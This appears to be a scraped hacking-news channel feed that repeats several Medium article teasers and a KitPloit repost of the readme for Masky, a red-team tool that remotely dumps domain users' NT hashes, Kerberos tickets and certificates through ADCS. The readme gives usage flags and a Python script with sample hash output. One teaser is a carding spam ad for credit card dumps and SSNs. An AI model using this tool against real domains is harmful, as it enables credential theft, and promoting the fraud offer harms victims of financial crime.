Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hackers Have Taken Over An Abandoned Satellite
https://cdn-images-1.medium.com/max/1024/0*yMx_UsG2v21ZCLo1
Karl Koscher and his friends did it by spending only $ 300.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hackers Have Taken Over An Abandoned Satellite
https://cdn-images-1.medium.com/max/1024/0*yMx_UsG2v21ZCLo1
Karl Koscher and his friends did it by spending only $ 300.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hackers Have Taken Over An Abandoned Satellite
Karl Koscher and his friends did it by spending only $ 300.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Top API Security Techniques for a Rapidly Changing Attack Surface
https://cdn-images-1.medium.com/max/1005/1*Z3ixgkFYF4G-S9S06XSPQw.jpeg
APIs are a valuable target for hackers. Due to their automated nature, APIs are more susceptible to resource usage and rate limiting…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Top API Security Techniques for a Rapidly Changing Attack Surface
https://cdn-images-1.medium.com/max/1005/1*Z3ixgkFYF4G-S9S06XSPQw.jpeg
APIs are a valuable target for hackers. Due to their automated nature, APIs are more susceptible to resource usage and rate limiting…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Top API Security Techniques for a Rapidly Changing Attack Surface
APIs are a valuable target for hackers. Due to their automated nature, APIs are more susceptible to resource usage and rate limiting…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Active Directory: Post-Compromise Attack — URL File Attack against Writable Share
https://cdn-images-1.medium.com/max/2600/1*POtY2LF8OGBrgjeD_cypNA.jpeg
When the user opens a file share and sees our file it automatically sends us there hash without user interaction.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Active Directory: Post-Compromise Attack — URL File Attack against Writable Share
https://cdn-images-1.medium.com/max/2600/1*POtY2LF8OGBrgjeD_cypNA.jpeg
When the user opens a file share and sees our file it automatically sends us there hash without user interaction.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Active Directory: Post-Compromise Attack — URL File Attack against Writable Share
When the user opens a file share and sees our file it automatically sends us there hash without user interaction.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What does a CHIEF INFORMATION SECURITY OFFICER (CISO) do?
https://cdn-images-1.medium.com/max/1080/1*uvbW6w0JH8lzmVAD8oe1NQ.png
This Cybersecurity role is responsible for the IT Security Strategy of the organization. In this article I will describe the role of the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What does a CHIEF INFORMATION SECURITY OFFICER (CISO) do?
https://cdn-images-1.medium.com/max/1080/1*uvbW6w0JH8lzmVAD8oe1NQ.png
This Cybersecurity role is responsible for the IT Security Strategy of the organization. In this article I will describe the role of the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What does a CHIEF INFORMATION SECURITY OFFICER (CISO) do?
This Cybersecurity role is responsible for the IT Security Strategy of the organization. In this article I will describe the role of the…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
EARN MONEY 100% ALL CREDIT CARD TOPUP WU Cashapp TRANSFER BANKS PAYPAL TRANSFER BLANK ATM DUMPS…
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
EARN MONEY 100% ALL CREDIT CARD TOPUP WU Cashapp TRANSFER BANKS PAYPAL TRANSFER BLANK ATM DUMPS…
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
EARN MONEY 100% ALL CREDIT CARD TOPUP WU Cashapp TRANSFER BANKS PAYPAL TRANSFER BLANK ATM DUMPS FULLZ SSN UI PUA SBA UPDATES
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Hacking on Medium
OverTheWire: Bandit wargame (Writeup -Part II)
https://cdn-images-1.medium.com/max/858/1*044LunJrnun4zBEirbkjRQ.png
Check part 1 of this series to understand & solve the next level easily.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
OverTheWire: Bandit wargame (Writeup -Part II)
https://cdn-images-1.medium.com/max/858/1*044LunJrnun4zBEirbkjRQ.png
Check part 1 of this series to understand & solve the next level easily.
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
OverTheWire: Bandit wargame (Writeup -Part II)
Check part 1 of this series to understand & solve the next level easily.
Hacking on Medium
Need For Ethical Hacking Training
Running a business or personal pursuit online these days isn’t without ingrained challenges. People have now started entering other sites…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Need For Ethical Hacking Training
Running a business or personal pursuit online these days isn’t without ingrained challenges. People have now started entering other sites…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Need For Ethical Hacking Training
Running a business or personal pursuit online these days isn’t without ingrained challenges. People have now started entering other sites…
Hacking on Medium
Hackers use these 4 techniques to crack passwords
One weak password is all hackers need to compromise applications or accounts and access confidential files and data. While cracking…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hackers use these 4 techniques to crack passwords
One weak password is all hackers need to compromise applications or accounts and access confidential files and data. While cracking…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hackers use these 4 techniques to crack passwords
One weak password is all hackers need to compromise applications or accounts and access confidential files and data. While cracking…
KitPloit - PenTest Tools!
Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory
___________________________
@hacking_Attack
@Hacking_Video
Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process…
My findings on Hack U.S Program
hello everyone myself charan (also know as falcon319) in bug bounty community and i am occasional bug bounty hunter and agriculture…Continue reading on Medium »
[Read more...](https://falcon319.medium.com/my-findings-on-hack-u-s-program-43b692a5c057?source=rss------bugbounty-5)
hello everyone myself charan (also know as falcon319) in bug bounty community and i am occasional bug bounty hunter and agriculture…Continue reading on Medium »
[Read more...](https://falcon319.medium.com/my-findings-on-hack-u-s-program-43b692a5c057?source=rss------bugbounty-5)
Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory
http://www.kitploit.com/2022/08/masky-python-library-with-cli-allowing.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/08/masky-python-library-with-cli-allowing.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process…
Masky is a python library (https://www.kitploit.com/search/label/Python%20Library) providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope. This tool does not exploit any new vulnerability (https://www.kitploit.com/search/label/Vulnerability) and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory (https://www.kitploit.com/search/label/Active%20Directory) features (token impersonation, certificate authentication (https://www.kitploit.com/search/label/Authentication) via kerberos & NT hashes retrieval via PKINIT). A blog post (https://z4ksec.github.io/posts/masky-release-v0.0.3/) was published to detail the implemented technics and how Masky works. Masky source code is largely based on the amazing Certify (https://github.com/GhostPack/Certify) and Certipy (https://github.com/ly4k/Certipy) tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section (https://github.com/Z4kSec/Masky#acknowledgments)).
Installation Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following: pip install masky
The Masky agent executable is already included within the PyPi package. Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built. Usage Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities. For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA. Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop. Command line The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.
___________________________
@hacking_Attack
@Hacking_Video
Installation Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following: pip install masky
The Masky agent executable is already included within the PyPi package. Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built. Usage Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities. For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA. Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop. Command line The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)
Python library Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target. from masky import Masky
from getpass import getpass
def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()
# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)
# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)
# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False
# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes() Its execution generate the following output. $> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults object containing a list of User objects is returned after a successful execution of Masky. Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes. Acknowledgments Olivier Lyak (https://twitter.com/ly4k_) for the Certipy (https://github.com/ly4k/Certipy) tool and the associated articles (https://medium.com/@oliverlyak) Will Schroeder (https://twitter.com/harmj0y) and Lee Christensen (https://twitter.com/tifkin_) for the Certify (https://github.com/GhostPack/Certify) tool and the Certified Pre-Owned (https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) article Dirk-jan (https://twitter.com/_dirkjan) for the PKINITtools (https://github.com/dirkjanm/PKINITtools) and its ADCS NTLM relay (https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) article SecureAuthCorp (https://github.com/SecureAuthCorp) and the associated contributors for the Impacket (https://github.com/SecureAuthCorp/impacket) library Pixis (https://twitter.com/HackAndDo) for the tool Lsassy (https://github.com/Hackndo/Lsassy) Incognito tool and its Metasploit implementation (https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/) S3cur3Th1sSh1t (https://twitter.com/ShitSecure) for the tool SharpImpersonation (https://github.com/S3cur3Th1sSh1t/SharpImpersonation) and the associated article (https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/) McAfee for their article regarding the token (https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf)impersonation (https://www.kitploit.com/search/label/Impersonation) techniques
___________________________
@hacking_Attack
@Hacking_Video
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)
Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)
Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)
Python library Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target. from masky import Masky
from getpass import getpass
def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()
# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)
# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)
# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False
# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")
return True
if __name__ == "__main__":
dump_nt_hashes() Its execution generate the following output. $> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a
A MaskyResults object containing a list of User objects is returned after a successful execution of Masky. Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes. Acknowledgments Olivier Lyak (https://twitter.com/ly4k_) for the Certipy (https://github.com/ly4k/Certipy) tool and the associated articles (https://medium.com/@oliverlyak) Will Schroeder (https://twitter.com/harmj0y) and Lee Christensen (https://twitter.com/tifkin_) for the Certify (https://github.com/GhostPack/Certify) tool and the Certified Pre-Owned (https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf) article Dirk-jan (https://twitter.com/_dirkjan) for the PKINITtools (https://github.com/dirkjanm/PKINITtools) and its ADCS NTLM relay (https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) article SecureAuthCorp (https://github.com/SecureAuthCorp) and the associated contributors for the Impacket (https://github.com/SecureAuthCorp/impacket) library Pixis (https://twitter.com/HackAndDo) for the tool Lsassy (https://github.com/Hackndo/Lsassy) Incognito tool and its Metasploit implementation (https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/) S3cur3Th1sSh1t (https://twitter.com/ShitSecure) for the tool SharpImpersonation (https://github.com/S3cur3Th1sSh1t/SharpImpersonation) and the associated article (https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/) McAfee for their article regarding the token (https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf)impersonation (https://www.kitploit.com/search/label/Impersonation) techniques
___________________________
@hacking_Attack
@Hacking_Video
X (formerly Twitter)
Oliver Lyak (@ly4k_) on X
Yet another security researcher 🔦 Github: https://t.co/7WFOFz17KI